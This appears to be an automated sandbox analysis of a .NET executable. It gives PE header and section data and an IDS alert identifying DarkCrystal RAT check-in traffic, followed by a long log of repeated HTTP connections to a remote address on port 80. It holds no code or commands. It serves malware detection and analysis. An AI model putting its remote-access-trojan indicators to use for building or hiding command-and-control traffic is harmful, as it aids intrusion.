                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x19d960 | 0x4b | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x19e000 | 0x320 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x1a0000 | 0xc | .reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x2000 | 0x19b9b4 | 0x19ba00 | 7221b2082660ad89451a005499022f76 | False | 0.7484656136122078 | data | 7.448087998754818 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rsrc | 0x19e000 | 0x320 | 0x400 | cc9c29dd08f1f9eac6e163c3743ab007 | False | 0.353515625 | data | 2.6537284131589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .reloc | 0x1a0000 | 0xc | 0x200 | 2f9bff5d95347eb46facd36be3e67b30 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_VERSION | 0x19e058 | 0x2c8 | data |  |  | 0.46207865168539325
                                                        DLL | Import
                                                        mscoree.dll | _CorExeMain
                                                        Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                        2024-10-30T05:22:07.511045+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49730 | 188.114.96.3 | 80 | TCP
                                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                        Oct 30, 2024 05:22:17.532931089 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.769099951 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:17.823574066 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.063199043 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.104932070 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.345877886 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.346647978 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.351588011 CET8049745188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.352273941 CET4974580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.352278948 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.352349997 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.352463961 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.357994080 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.698719025 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:18.705203056 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.950525045 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:18.995469093 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.277766943 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.323626995 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.405169010 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.405569077 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.410875082 CET8049746188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.411062002 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.411138058 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.411190033 CET4974680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.411257982 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.417296886 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.715763092 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.716116905 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.721447945 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.721510887 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.721645117 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.727029085 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.766573906 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.841146946 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.846610069 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.846664906 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.846756935 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:19.852322102 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.912870884 CET8049748188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:19.912924051 CET4974880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.073736906 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.079257011 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.079272985 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.198719978 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.204076052 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.354216099 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.401722908 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.442985058 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.495479107 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.569827080 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.620477915 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.755902052 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.807998896 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.883693933 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.883979082 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.884591103 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889281988 CET8049749188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.889333963 CET4974980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889616966 CET8049751188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.889659882 CET4975180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.889974117 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:20.890038967 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.890213966 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:20.895469904 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.245680094 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.251744032 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.495198965 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.542354107 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.807921886 CET8049752188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.854887009 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.932518005 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.937942982 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:21.938033104 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.938133001 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:21.943453074 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.292851925 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.298454046 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.675173998 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.729954004 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.845477104 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.886147022 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.961935997 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.962721109 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.967749119 CET8049753188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.967830896 CET4975380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.968111992 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:22.968180895 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.968296051 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:22.973628998 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.324178934 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:23.329818010 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.564693928 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.620572090 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:23.777857065 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:23.823683977 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.208312988 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.208743095 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214102983 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.214179039 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214325905 CET8049754188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.214390039 CET4975480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.214508057 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.219872952 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.574038029 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:24.579694986 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.813105106 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:24.854939938 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.128501892 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.183099985 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.244019032 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.244939089 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.249938965 CET8049755188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.250015974 CET4975580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.250356913 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.250432968 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.250540018 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.255855083 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.575530052 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.575587988 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.580997944 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.581135988 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.581412077 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.586746931 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.622595072 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.696671009 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.702147007 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.702286959 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.702455997 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.707760096 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.738974094 CET8049756188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.739213943 CET4975680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.933413029 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:25.938937902 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:25.939055920 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.058123112 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.063555002 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.169406891 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.214307070 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.303546906 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.354939938 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.476856947 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.526782036 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.609280109 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.609304905 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.609404087 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.776631117 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.776848078 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.777510881 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.936162949 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.936297894 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937203884 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.937257051 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937429905 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.937541962 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.937788010 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.939393997 CET8049757188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.939410925 CET8049758188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:26.939455986 CET4975780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.939481974 CET4975880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:26.943033934 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.292737961 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.298573017 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.544359922 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.589265108 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.750662088 CET8049759188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.792442083 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.869409084 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.874866009 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:27.874941111 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.875128031 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:27.880402088 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.230424881 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.236136913 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.484014034 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.526757002 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.688694954 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.688726902 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.688813925 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.806385040 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.806875944 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812242031 CET8049760188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.812324047 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.812335968 CET4976080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812390089 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.812566996 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:28.817843914 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:28.823750973 CET4975980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.197020054 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.202513933 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.411355972 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.464293003 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:29.936551094 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.942617893 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:29.943881035 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.057480097 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.058353901 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063433886 CET8049761188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.063508034 CET4976180192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063646078 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.063718081 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.063885927 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.069195032 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.417610884 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.423160076 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.669910908 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:30.714348078 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:30.981450081 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.026794910 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.106797934 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.107724905 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.112889051 CET8049762188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.113002062 CET4976280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.113104105 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.113172054 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.113405943 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.118665934 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.464392900 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.469984055 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.497697115 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.498053074 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.503294945 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.503417969 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.508161068 CET4976480192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.513537884 CET8049764188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.550635099 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.588196993 CET8049763188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:31.588284969 CET4976380192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:31.634295940 CET4976580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:49.855007887 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.029676914 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.073800087 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.120505095 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.167658091 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.344172001 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.344187975 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.344371080 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.571958065 CET4974280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.572146893 CET4975280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.605133057 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.605195999 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.610702991 CET8049785188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.610768080 CET4978580192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.611031055 CET8049786188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.611077070 CET4978680192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.616698980 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.621974945 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.622047901 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.625813961 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.631043911 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:50.980386972 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:50.988023043 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.224934101 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.277091026 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.431576967 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.480175018 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.554656982 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.555459976 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.566945076 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.567131996 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.567152023 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.569323063 CET8049787188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.569385052 CET4978780192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.572504044 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:51.917705059 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:51.931320906 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.176901102 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.230123043 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.514240026 CET8049788188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.558552980 CET4978880192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.631817102 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.637322903 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.637432098 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.637484074 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:52.642740965 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:52.996052027 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.001404047 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.233419895 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.276946068 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.444359064 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.495778084 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.567547083 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.568396091 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573577881 CET8049789188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.573652983 CET4978980192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573687077 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.573770046 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.573873997 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.579117060 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:53.933357954 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:53.938848972 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.177365065 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.230040073 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.423239946 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.423285961 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.423429966 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.544001102 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.544799089 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.549777985 CET8049790188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.549864054 CET4979080192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.550153017 CET8049792188.114.96.3192.168.2.4
                                                        Oct 30, 2024 05:22:54.550237894 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.550302982 CET4979280192.168.2.4188.114.96.3
                                                        Oct 30, 2024 05:22:54.555671930 CET8049792188.114.96.3192.168.2.4
